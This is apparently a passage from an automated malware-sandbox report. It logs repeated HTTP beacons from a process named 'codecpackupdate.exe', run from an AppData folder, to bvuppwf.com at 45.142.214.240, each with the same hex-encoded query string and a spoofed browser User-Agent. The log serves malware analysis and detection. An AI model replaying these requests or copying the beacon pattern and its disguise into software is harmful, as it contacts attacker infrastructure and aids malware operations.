                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:05.364540100 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:05 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.44974945.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:05.701803923 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:05.999649048 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:05 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:06.106339931 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:06.412883043 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:06 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.44975045.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:06.748155117 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:07.046247959 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:06 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:07.153408051 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:07.458676100 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:07 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.44975145.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:07.805202961 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:08.101895094 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:07 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.44975245.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:08.435174942 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:08.741849899 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:08 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.44975345.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:09.075777054 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:09.380022049 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:09 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.44975445.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:09.713854074 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:10.009288073 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:09 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:10.122006893 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:10.425319910 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:10 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.44975545.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:10.764656067 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:11.064590931 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:10 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.44975645.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:11.403064966 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:11.705988884 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:11 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.2.44975745.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:12.050126076 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:12.361087084 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:12 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        18192.168.2.44975845.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:12.708509922 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:13.009927988 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:12 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:13.121896029 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:13.428590059 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:13 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        19192.168.2.44975945.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:13.760736942 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:14.055845976 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:13 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:14.168811083 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:14.470607996 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:14 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        20192.168.2.44976045.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:14.816267967 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:15.117500067 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:15 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        21192.168.2.44976145.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:15.452589989 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:15.754421949 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:15 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        22192.168.2.44976245.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:16.093878984 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:16.402996063 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:16 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:16.512774944 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:16.811521053 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:16 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:16.918884993 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:17.222748041 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:17 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        23192.168.2.44976345.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:17.561358929 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:17.862667084 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:17 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        24192.168.2.44976445.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:18.201076984 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:18.507728100 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:18 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        25192.168.2.44976545.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:18.842102051 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:19.143948078 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:19 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        26192.168.2.44976645.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:19.483683109 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:19.782752991 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:19 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
